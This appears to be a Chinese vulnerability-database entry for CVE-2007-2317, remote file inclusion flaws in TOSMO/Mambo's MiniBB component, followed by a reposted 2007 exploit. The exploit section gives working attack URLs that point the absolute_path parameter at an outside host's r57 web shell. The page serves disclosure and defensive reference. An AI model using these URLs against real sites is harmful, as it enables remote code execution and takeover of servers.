TOSMO/Mambo absolute_path参数多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112688 漏洞类型 输入验证
发布时间 2007-04-11 更新时间 2007-04-27
CVE编号 CVE-2007-2317 CNNVD-ID CNNVD-200704-521
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3707
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-521
|漏洞详情
当被TOSMO/Mambo和可能其他产品使用时,MiniBBForum中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)components/minibb/或(2)components/com_minibb或(3)configuration.php中的bb_plugins.php文件的absolute_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
=======================================================
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x&i=tosmo_mambo.zip
==============================================
File : /components/com_minibb.php
include("$absolute_path/components/minibb/bb_admin.php");
======
/components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt?

========================================================

File : /components/minibb/bb_plugins.php

<?php
include ($absolute_path.'/components/minibb/hack_smilies.php');
?>
======
/components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================

File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
include_once("$absolute_path/version.php");
======
/configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================
#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]
|参考资料

来源:XF
名称:tosmomambo-absolutepath-file-include(33578)
链接:http://xforce.iss.net/xforce/xfdb/33578
来源:BID
名称:23416
链接:http://www.securityfocus.com/bid/23416
来源:MILW0RM
名称:3707
链接:http://www.milw0rm.com/exploits/3707
来源:VUPEN
名称:ADV-2007-1354
链接:http://www.frsirt.com/english/advisories/2007/1354
来源:VIM
名称:20070413Dup:TOSMO/Mambo1.4.13a(absolute_path)RemoteFileInclusionVulns
链接:http://www.attrition.org/pipermail/vim/2007-April/001518.html
来源:OSVDB
名称:35762
链接:http://osvdb.org/35762
来源:OSVDB
名称:35761
链接:http://osvdb.org/35761